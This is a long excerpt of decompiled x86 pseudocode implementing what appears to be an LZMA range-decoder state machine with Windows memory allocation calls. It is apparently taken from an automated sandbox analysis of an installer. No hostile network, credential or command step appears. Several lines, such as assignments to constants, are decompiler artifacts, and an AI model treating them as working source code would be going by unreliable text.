                                                											case 0:
                                                												if( *(_t621 - 0x6c) == 0) {
                                                													goto L170;
                                                												}
                                                												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                												_t543 =  *( *(_t621 - 0x70));
                                                												if(_t543 > 0xe1) {
                                                													goto L171;
                                                												}
                                                												_t547 = _t543 & 0x000000ff;
                                                												_push(0x2d);
                                                												asm("cdq");
                                                												_pop(_t578);
                                                												_push(9);
                                                												_pop(_t579);
                                                												_t617 = _t547 / _t578;
                                                												_t549 = _t547 % _t578 & 0x000000ff;
                                                												asm("cdq");
                                                												_t612 = _t549 % _t579 & 0x000000ff;
                                                												 *(_t621 - 0x3c) = _t612;
                                                												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                                                												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                                                												_t620 = (0x300 << _t612 + _t617) + 0x736;
                                                												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                                                													L10:
                                                													if(_t620 == 0) {
                                                														L12:
                                                														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                                                														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                														goto L15;
                                                													} else {
                                                														goto L11;
                                                													}
                                                													do {
                                                														L11:
                                                														_t620 = _t620 - 1;
                                                														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                                                													} while (_t620 != 0);
                                                													goto L12;
                                                												}
                                                												if( *(_t621 - 4) != 0) {
                                                													GlobalFree( *(_t621 - 4));
                                                												}
                                                												_t543 = GlobalAlloc(0x40, 0x600); // executed
                                                												 *(_t621 - 4) = _t543;
                                                												if(_t543 == 0) {
                                                													goto L171;
                                                												} else {
                                                													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                                                													goto L10;
                                                												}
                                                											case 1:
                                                												L13:
                                                												__eflags =  *(_t621 - 0x6c);
                                                												if( *(_t621 - 0x6c) == 0) {
                                                													 *(_t621 - 0x88) = 1;
                                                													goto L170;
                                                												}
                                                												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                                                												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                												_t45 = _t621 - 0x48;
                                                												 *_t45 =  *(_t621 - 0x48) + 1;
                                                												__eflags =  *_t45;
                                                												L15:
                                                												if( *(_t621 - 0x48) < 4) {
                                                													goto L13;
                                                												}
                                                												_t555 =  *(_t621 - 0x40);
                                                												if(_t555 ==  *(_t621 - 0x74)) {
                                                													L20:
                                                													 *(_t621 - 0x48) = 5;
                                                													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                                                													goto L23;
                                                												}
                                                												 *(_t621 - 0x74) = _t555;
                                                												if( *(_t621 - 8) != 0) {
                                                													GlobalFree( *(_t621 - 8));
                                                												}
                                                												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                                                												 *(_t621 - 8) = _t543;
                                                												if(_t543 == 0) {
                                                													goto L171;
                                                												} else {
                                                													goto L20;
                                                												}
                                                											case 2:
                                                												L24:
                                                												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                                                												 *(_t621 - 0x84) = 6;
                                                												 *(_t621 - 0x4c) = _t562;
                                                												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                                                												goto L132;
                                                											case 3:
                                                												L21:
                                                												__eflags =  *(_t621 - 0x6c);
                                                												if( *(_t621 - 0x6c) == 0) {
                                                													 *(_t621 - 0x88) = 3;
                                                													goto L170;
                                                												}
                                                												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                												_t67 = _t621 - 0x70;
                                                												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                                                												__eflags =  *_t67;
                                                												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                												L23:
                                                												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                                                												if( *(_t621 - 0x48) != 0) {
                                                													goto L21;
                                                												}
                                                												goto L24;
                                                											case 4:
                                                												L133:
                                                												_t540 =  *_t614;
                                                												_t597 = _t540 & 0x0000ffff;
                                                												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                												if( *(_t621 - 0xc) >= _t573) {
                                                													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                													 *(_t621 - 0x40) = 1;
                                                													_t541 = _t540 - (_t540 >> 5);
                                                													 *_t614 = _t541;
                                                												} else {
                                                													 *(_t621 - 0x10) = _t573;
                                                													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                												}
                                                												if( *(_t621 - 0x10) >= 0x1000000) {
                                                													goto L139;
                                                												}
                                                											case 5:
                                                												goto L137;
                                                											case 6:
                                                												__edx = 0;
                                                												__eflags =  *(__ebp - 0x40);
                                                												if( *(__ebp - 0x40) != 0) {
                                                													__eax =  *(__ebp - 4);
                                                													__ecx =  *(__ebp - 0x38);
                                                													 *(__ebp - 0x34) = 1;
                                                													 *(__ebp - 0x84) = 7;
                                                													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                													L132:
                                                													 *(_t621 - 0x54) = _t614;
                                                													goto L133;
                                                												}
                                                												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                												__esi =  *(__ebp - 0x60);
                                                												__cl = 8;
                                                												__cl = 8 -  *(__ebp - 0x3c);
                                                												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                												__ecx =  *(__ebp - 0x3c);
                                                												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                												__ecx =  *(__ebp - 4);
                                                												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                												__eflags =  *(__ebp - 0x38) - 4;
                                                												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                												if( *(__ebp - 0x38) >= 4) {
                                                													__eflags =  *(__ebp - 0x38) - 0xa;
                                                													if( *(__ebp - 0x38) >= 0xa) {
                                                														_t98 = __ebp - 0x38;
                                                														 *_t98 =  *(__ebp - 0x38) - 6;
                                                														__eflags =  *_t98;
                                                													} else {
                                                														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                													}
                                                												} else {
                                                													 *(__ebp - 0x38) = 0;
                                                												}
                                                												__eflags =  *(__ebp - 0x34) - __edx;
                                                												if( *(__ebp - 0x34) == __edx) {
                                                													__ebx = 0;
                                                													__ebx = 1;
                                                													goto L61;
                                                												} else {
                                                													__eax =  *(__ebp - 0x14);
                                                													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                													__eflags = __eax -  *(__ebp - 0x74);
                                                													if(__eax >=  *(__ebp - 0x74)) {
                                                														__eax = __eax +  *(__ebp - 0x74);
                                                														__eflags = __eax;
                                                													}
                                                													__ecx =  *(__ebp - 8);
                                                													__ebx = 0;
                                                													__ebx = 1;
                                                													__al =  *((intOrPtr*)(__eax + __ecx));
                                                													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                													goto L41;
                                                												}
                                                											case 7:
                                                												goto L0;
                                                											case 8:
                                                												__eflags =  *(__ebp - 0x40);
                                                												if( *(__ebp - 0x40) != 0) {
                                                													__eax =  *(__ebp - 4);
                                                													__ecx =  *(__ebp - 0x38);
                                                													 *(__ebp - 0x84) = 0xa;
                                                													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                												} else {
                                                													__eax =  *(__ebp - 0x38);
                                                													__ecx =  *(__ebp - 4);
                                                													__eax =  *(__ebp - 0x38) + 0xf;
                                                													 *(__ebp - 0x84) = 9;
                                                													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                												}
                                                												while(1) {
                                                													L132:
                                                													 *(_t621 - 0x54) = _t614;
                                                													goto L133;
                                                												}
                                                											case 9:
                                                												__eflags =  *(__ebp - 0x40);
                                                												if( *(__ebp - 0x40) != 0) {
                                                													goto L89;
                                                												}
                                                												__eflags =  *(__ebp - 0x60);
                                                												if( *(__ebp - 0x60) == 0) {
                                                													goto L171;
                                                												}
                                                												__eax = 0;
                                                												__eflags =  *(__ebp - 0x38) - 7;
                                                												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                												__eflags = _t258;
                                                												0 | _t258 = _t258 + _t258 + 9;
                                                												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                												goto L75;
                                                											case 0xa:
                                                												__eflags =  *(__ebp - 0x40);
                                                												if( *(__ebp - 0x40) != 0) {
                                                													__eax =  *(__ebp - 4);
                                                													__ecx =  *(__ebp - 0x38);
                                                													 *(__ebp - 0x84) = 0xb;
                                                													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                													while(1) {
                                                														L132:
                                                														 *(_t621 - 0x54) = _t614;
                                                														goto L133;
                                                													}
                                                												}
                                                												__eax =  *(__ebp - 0x28);
                                                												goto L88;
                                                											case 0xb:
                                                												__eflags =  *(__ebp - 0x40);
                                                												if( *(__ebp - 0x40) != 0) {
                                                													__ecx =  *(__ebp - 0x24);
                                                													__eax =  *(__ebp - 0x20);
                                                													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                												} else {
                                                													__eax =  *(__ebp - 0x24);
                                                												}
                                                												__ecx =  *(__ebp - 0x28);
                                                												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                												L88:
                                                												__ecx =  *(__ebp - 0x2c);
                                                												 *(__ebp - 0x2c) = __eax;
                                                												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                												L89:
                                                												__eax =  *(__ebp - 4);
                                                												 *(__ebp - 0x80) = 0x15;
                                                												__eax =  *(__ebp - 4) + 0xa68;
                                                												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                												goto L68;
                                                											case 0xc:
                                                												L99:
                                                												__eflags =  *(__ebp - 0x6c);
                                                												if( *(__ebp - 0x6c) == 0) {
                                                													 *(__ebp - 0x88) = 0xc;
                                                													goto L170;
                                                												}
                                                												__ecx =  *(__ebp - 0x70);
                                                												__eax =  *(__ebp - 0xc);
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												_t334 = __ebp - 0x70;
                                                												 *_t334 =  *(__ebp - 0x70) + 1;
                                                												__eflags =  *_t334;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												__eax =  *(__ebp - 0x2c);
                                                												goto L101;
                                                											case 0xd:
                                                												L37:
                                                												__eflags =  *(__ebp - 0x6c);
                                                												if( *(__ebp - 0x6c) == 0) {
                                                													 *(__ebp - 0x88) = 0xd;
                                                													goto L170;
                                                												}
                                                												__ecx =  *(__ebp - 0x70);
                                                												__eax =  *(__ebp - 0xc);
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												_t122 = __ebp - 0x70;
                                                												 *_t122 =  *(__ebp - 0x70) + 1;
                                                												__eflags =  *_t122;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												L39:
                                                												__eax =  *(__ebp - 0x40);
                                                												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                													goto L48;
                                                												}
                                                												__eflags = __ebx - 0x100;
                                                												if(__ebx >= 0x100) {
                                                													goto L54;
                                                												}
                                                												L41:
                                                												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                												__ecx =  *(__ebp - 0x58);
                                                												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                												 *(__ebp - 0x48) = __eax;
                                                												__eax = __eax + 1;
                                                												__eax = __eax << 8;
                                                												__eax = __eax + __ebx;
                                                												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                												__ax =  *__esi;
                                                												 *(__ebp - 0x54) = __esi;
                                                												__edx = __ax & 0x0000ffff;
                                                												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                												__eflags =  *(__ebp - 0xc) - __ecx;
                                                												if( *(__ebp - 0xc) >= __ecx) {
                                                													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                													__cx = __ax;
                                                													 *(__ebp - 0x40) = 1;
                                                													__cx = __ax >> 5;
                                                													__eflags = __eax;
                                                													__ebx = __ebx + __ebx + 1;
                                                													 *__esi = __ax;
                                                												} else {
                                                													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                													 *(__ebp - 0x10) = __ecx;
                                                													0x800 = 0x800 - __edx;
                                                													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                													__ebx = __ebx + __ebx;
                                                													 *__esi = __cx;
                                                												}
                                                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                												 *(__ebp - 0x44) = __ebx;
                                                												if( *(__ebp - 0x10) >= 0x1000000) {
                                                													goto L39;
                                                												} else {
                                                													goto L37;
                                                												}
                                                											case 0xe:
                                                												L46:
                                                												__eflags =  *(__ebp - 0x6c);
                                                												if( *(__ebp - 0x6c) == 0) {
                                                													 *(__ebp - 0x88) = 0xe;
                                                													goto L170;
                                                												}
                                                												__ecx =  *(__ebp - 0x70);
                                                												__eax =  *(__ebp - 0xc);
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												_t156 = __ebp - 0x70;
                                                												 *_t156 =  *(__ebp - 0x70) + 1;
                                                												__eflags =  *_t156;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												while(1) {
                                                													L48:
                                                													__eflags = __ebx - 0x100;
                                                													if(__ebx >= 0x100) {
                                                														break;
                                                													}
                                                													__eax =  *(__ebp - 0x58);
                                                													__edx = __ebx + __ebx;
                                                													__ecx =  *(__ebp - 0x10);
                                                													__esi = __edx + __eax;
                                                													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                													__ax =  *__esi;
                                                													 *(__ebp - 0x54) = __esi;
                                                													__edi = __ax & 0x0000ffff;
                                                													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                													__eflags =  *(__ebp - 0xc) - __ecx;
                                                													if( *(__ebp - 0xc) >= __ecx) {
                                                														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                														__cx = __ax;
                                                														_t170 = __edx + 1; // 0x1
                                                														__ebx = _t170;
                                                														__cx = __ax >> 5;
                                                														__eflags = __eax;
                                                														 *__esi = __ax;
                                                													} else {
                                                														 *(__ebp - 0x10) = __ecx;
                                                														0x800 = 0x800 - __edi;
                                                														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                														__ebx = __ebx + __ebx;
                                                														 *__esi = __cx;
                                                													}
                                                													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                													 *(__ebp - 0x44) = __ebx;
                                                													if( *(__ebp - 0x10) >= 0x1000000) {
                                                														continue;
                                                													} else {
                                                														goto L46;
                                                													}
                                                												}
                                                												L54:
                                                												_t173 = __ebp - 0x34;
                                                												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                												__eflags =  *_t173;
                                                												goto L55;
                                                											case 0xf:
                                                												L58:
                                                												__eflags =  *(__ebp - 0x6c);
                                                												if( *(__ebp - 0x6c) == 0) {
                                                													 *(__ebp - 0x88) = 0xf;
                                                													goto L170;
                                                												}
                                                												__ecx =  *(__ebp - 0x70);
                                                												__eax =  *(__ebp - 0xc);
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												_t203 = __ebp - 0x70;
                                                												 *_t203 =  *(__ebp - 0x70) + 1;
                                                												__eflags =  *_t203;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												L60:
                                                												__eflags = __ebx - 0x100;
                                                												if(__ebx >= 0x100) {
                                                													L55:
                                                													__al =  *(__ebp - 0x44);
                                                													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                													goto L56;
                                                												}
                                                												L61:
                                                												__eax =  *(__ebp - 0x58);
                                                												__edx = __ebx + __ebx;
                                                												__ecx =  *(__ebp - 0x10);
                                                												__esi = __edx + __eax;
                                                												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                												__ax =  *__esi;
                                                												 *(__ebp - 0x54) = __esi;
                                                												__edi = __ax & 0x0000ffff;
                                                												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                												__eflags =  *(__ebp - 0xc) - __ecx;
                                                												if( *(__ebp - 0xc) >= __ecx) {
                                                													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                													__cx = __ax;
                                                													_t217 = __edx + 1; // 0x1
                                                													__ebx = _t217;
                                                													__cx = __ax >> 5;
                                                													__eflags = __eax;
                                                													 *__esi = __ax;
                                                												} else {
                                                													 *(__ebp - 0x10) = __ecx;
                                                													0x800 = 0x800 - __edi;
                                                													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                													__ebx = __ebx + __ebx;
                                                													 *__esi = __cx;
                                                												}
                                                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                												 *(__ebp - 0x44) = __ebx;
                                                												if( *(__ebp - 0x10) >= 0x1000000) {
                                                													goto L60;
                                                												} else {
                                                													goto L58;
                                                												}
                                                											case 0x10:
                                                												L109:
                                                												__eflags =  *(__ebp - 0x6c);
                                                												if( *(__ebp - 0x6c) == 0) {
                                                													 *(__ebp - 0x88) = 0x10;
                                                													goto L170;
                                                												}
                                                												__ecx =  *(__ebp - 0x70);
                                                												__eax =  *(__ebp - 0xc);
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												_t365 = __ebp - 0x70;
                                                												 *_t365 =  *(__ebp - 0x70) + 1;
                                                												__eflags =  *_t365;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												goto L111;
                                                											case 0x11:
                                                												L68:
                                                												_t614 =  *(_t621 - 0x58);
                                                												 *(_t621 - 0x84) = 0x12;
                                                												while(1) {
                                                													L132:
                                                													 *(_t621 - 0x54) = _t614;
                                                													goto L133;
                                                												}
                                                											case 0x12:
                                                												__eflags =  *(__ebp - 0x40);
                                                												if( *(__ebp - 0x40) != 0) {
                                                													__eax =  *(__ebp - 0x58);
                                                													 *(__ebp - 0x84) = 0x13;
                                                													__esi =  *(__ebp - 0x58) + 2;
                                                													while(1) {
                                                														L132:
                                                														 *(_t621 - 0x54) = _t614;
                                                														goto L133;
                                                													}
                                                												}
                                                												__eax =  *(__ebp - 0x4c);
                                                												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                												__ecx =  *(__ebp - 0x58);
                                                												__eax =  *(__ebp - 0x4c) << 4;
                                                												__eflags = __eax;
                                                												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                												goto L130;
                                                											case 0x13:
                                                												__eflags =  *(__ebp - 0x40);
                                                												if( *(__ebp - 0x40) != 0) {
                                                													_t469 = __ebp - 0x58;
                                                													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                													__eflags =  *_t469;
                                                													 *(__ebp - 0x30) = 0x10;
                                                													 *(__ebp - 0x40) = 8;
                                                													L144:
                                                													 *(__ebp - 0x7c) = 0x14;
                                                													goto L145;
                                                												}
                                                												__eax =  *(__ebp - 0x4c);
                                                												__ecx =  *(__ebp - 0x58);
                                                												__eax =  *(__ebp - 0x4c) << 4;
                                                												 *(__ebp - 0x30) = 8;
                                                												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                												L130:
                                                												 *(__ebp - 0x58) = __eax;
                                                												 *(__ebp - 0x40) = 3;
                                                												goto L144;
                                                											case 0x14:
                                                												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                												__eax =  *(__ebp - 0x80);
                                                												 *(_t621 - 0x88) = _t542;
                                                												goto L1;
                                                											case 0x15:
                                                												__eax = 0;
                                                												__eflags =  *(__ebp - 0x38) - 7;
                                                												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                												__al = __al & 0x000000fd;
                                                												__eax = (__eflags >= 0) - 1 + 0xb;
                                                												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                												goto L120;
                                                											case 0x16:
                                                												__eax =  *(__ebp - 0x30);
                                                												__eflags = __eax - 4;
                                                												if(__eax >= 4) {
                                                													_push(3);
                                                													_pop(__eax);
                                                												}
                                                												__ecx =  *(__ebp - 4);
                                                												 *(__ebp - 0x40) = 6;
                                                												__eax = __eax << 7;
                                                												 *(__ebp - 0x7c) = 0x19;
                                                												 *(__ebp - 0x58) = __eax;
                                                												goto L145;
                                                											case 0x17:
                                                												L145:
                                                												__eax =  *(__ebp - 0x40);
                                                												 *(__ebp - 0x50) = 1;
                                                												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                												goto L149;
                                                											case 0x18:
                                                												L146:
                                                												__eflags =  *(__ebp - 0x6c);
                                                												if( *(__ebp - 0x6c) == 0) {
                                                													 *(__ebp - 0x88) = 0x18;
                                                													goto L170;
                                                												}
                                                												__ecx =  *(__ebp - 0x70);
                                                												__eax =  *(__ebp - 0xc);
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												_t484 = __ebp - 0x70;
                                                												 *_t484 =  *(__ebp - 0x70) + 1;
                                                												__eflags =  *_t484;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												L148:
                                                												_t487 = __ebp - 0x48;
                                                												 *_t487 =  *(__ebp - 0x48) - 1;
                                                												__eflags =  *_t487;
                                                												L149:
                                                												__eflags =  *(__ebp - 0x48);
                                                												if( *(__ebp - 0x48) <= 0) {
                                                													__ecx =  *(__ebp - 0x40);
                                                													__ebx =  *(__ebp - 0x50);
                                                													0 = 1;
                                                													__eax = 1 << __cl;
                                                													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                													__eax =  *(__ebp - 0x7c);
                                                													 *(__ebp - 0x44) = __ebx;
                                                													while(1) {
                                                														 *(_t621 - 0x88) = _t542;
                                                														goto L1;
                                                													}
                                                												}
                                                												__eax =  *(__ebp - 0x50);
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                												__eax =  *(__ebp - 0x58);
                                                												__esi = __edx + __eax;
                                                												 *(__ebp - 0x54) = __esi;
                                                												__ax =  *__esi;
                                                												__edi = __ax & 0x0000ffff;
                                                												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                												__eflags =  *(__ebp - 0xc) - __ecx;
                                                												if( *(__ebp - 0xc) >= __ecx) {
                                                													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                													__cx = __ax;
                                                													__cx = __ax >> 5;
                                                													__eax = __eax - __ecx;
                                                													__edx = __edx + 1;
                                                													__eflags = __edx;
                                                													 *__esi = __ax;
                                                													 *(__ebp - 0x50) = __edx;
                                                												} else {
                                                													 *(__ebp - 0x10) = __ecx;
                                                													0x800 = 0x800 - __edi;
                                                													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                													 *__esi = __cx;
                                                												}
                                                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                												if( *(__ebp - 0x10) >= 0x1000000) {
                                                													goto L148;
                                                												} else {
                                                													goto L146;
                                                												}
                                                											case 0x19:
                                                												__eflags = __ebx - 4;
                                                												if(__ebx < 4) {
                                                													 *(__ebp - 0x2c) = __ebx;
                                                													L119:
                                                													_t393 = __ebp - 0x2c;
                                                													 *_t393 =  *(__ebp - 0x2c) + 1;
                                                													__eflags =  *_t393;
                                                													L120:
                                                													__eax =  *(__ebp - 0x2c);
                                                													__eflags = __eax;
                                                													if(__eax == 0) {
                                                														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                														goto L170;
                                                													}
                                                													__eflags = __eax -  *(__ebp - 0x60);
                                                													if(__eax >  *(__ebp - 0x60)) {
                                                														goto L171;
                                                													}
                                                													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                													__eax =  *(__ebp - 0x30);
                                                													_t400 = __ebp - 0x60;
                                                													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                													__eflags =  *_t400;
                                                													goto L123;
                                                												}
                                                												__ecx = __ebx;
                                                												__eax = __ebx;
                                                												__ecx = __ebx >> 1;
                                                												__eax = __ebx & 0x00000001;
                                                												__ecx = (__ebx >> 1) - 1;
                                                												__al = __al | 0x00000002;
                                                												__eax = (__ebx & 0x00000001) << __cl;
                                                												__eflags = __ebx - 0xe;
                                                												 *(__ebp - 0x2c) = __eax;
                                                												if(__ebx >= 0xe) {
                                                													__ebx = 0;
                                                													 *(__ebp - 0x48) = __ecx;
                                                													L102:
                                                													__eflags =  *(__ebp - 0x48);
                                                													if( *(__ebp - 0x48) <= 0) {
                                                														__eax = __eax + __ebx;
                                                														 *(__ebp - 0x40) = 4;
                                                														 *(__ebp - 0x2c) = __eax;
                                                														__eax =  *(__ebp - 4);
                                                														__eax =  *(__ebp - 4) + 0x644;
                                                														__eflags = __eax;
